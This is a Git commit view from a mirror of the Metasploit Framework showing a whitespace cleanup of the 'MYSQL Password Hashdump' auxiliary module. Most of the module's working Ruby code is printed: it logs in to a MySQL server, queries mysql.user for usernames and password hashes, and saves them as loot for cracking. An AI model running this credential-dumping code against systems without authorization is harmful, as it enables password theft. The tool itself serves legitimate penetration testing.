infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fix whitespace

MS-2855/keylogger-mettle-extension
Brent Cook 2018-02-08 13:48:24 -06:00
parent 00ead05237
commit 1bb5499fce
1 changed files with 54 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

112
modules/auxiliary/scanner/mysql/mysql_hashdump.rb
View File

@ -12,10 +12,10 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'MYSQL Password Hashdump',
'Description' => %Q{
'Description' => %(
This module extracts the usernames and encrypted password
hashes from a MySQL server and stores them for later cracking.
},
),
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
)
@ -23,53 +23,10 @@ class MetasploitModule < Msf::Auxiliary
def run_host(ip)
if (not mysql_login_datastore)
return
end
return unless mysql_login_datastore
service_data = {
address: ip,
port: rport,
service_name: 'mysql',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: datastore['PASSWORD'],
private_type: :password,
username: datastore['USERNAME']
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
#Grabs the username and password hashes and stores them as loot
version = mysql_get_variable("@@version")
if (5.6 < version[0..2].to_f)
res = mysql_query("SELECT user,authentication_string from mysql.user")
else
res = mysql_query("SELECT user,password from mysql.user")
end
if res.nil?
print_error("There was an error reading the MySQL User Table")
return
end
service_data = {
address: ::Rex::Socket.getaddress(rhost,true),
address: ip,
port: rport,
service_name: 'mysql',
protocol: 'tcp',
@ -77,10 +34,54 @@ class MetasploitModule < Msf::Auxiliary
}
credential_data = {
origin_type: :service,
jtr_format: 'mysql,mysql-sha1',
module_fullname: self.fullname,
private_type: :nonreplayable_hash
module_fullname: self.fullname,
origin_type: :service,
private_data: datastore['PASSWORD'],
private_type: :password,
username: datastore['USERNAME']
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
# Grab the username and password hashes and store them as loot
version = mysql_get_variable("@@version")
# Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'.
if version[0..2].to_f > 5.6
res = mysql_query("SELECT user,authentication_string from mysql.user")
else
res = mysql_query("SELECT user,password from mysql.user")
end
if res.nil?
print_error("There was an error reading the MySQL User Table")
return
end
service_data = {
address: ::Rex::Socket.getaddress(rhost, true),
port: rport,
service_name: 'mysql',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
jtr_format: 'mysql,mysql-sha1',
module_fullname: self.fullname,
private_type: :nonreplayable_hash
}
credential_data.merge!(service_data)
@ -92,17 +93,12 @@ class MetasploitModule < Msf::Auxiliary
print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end
end
end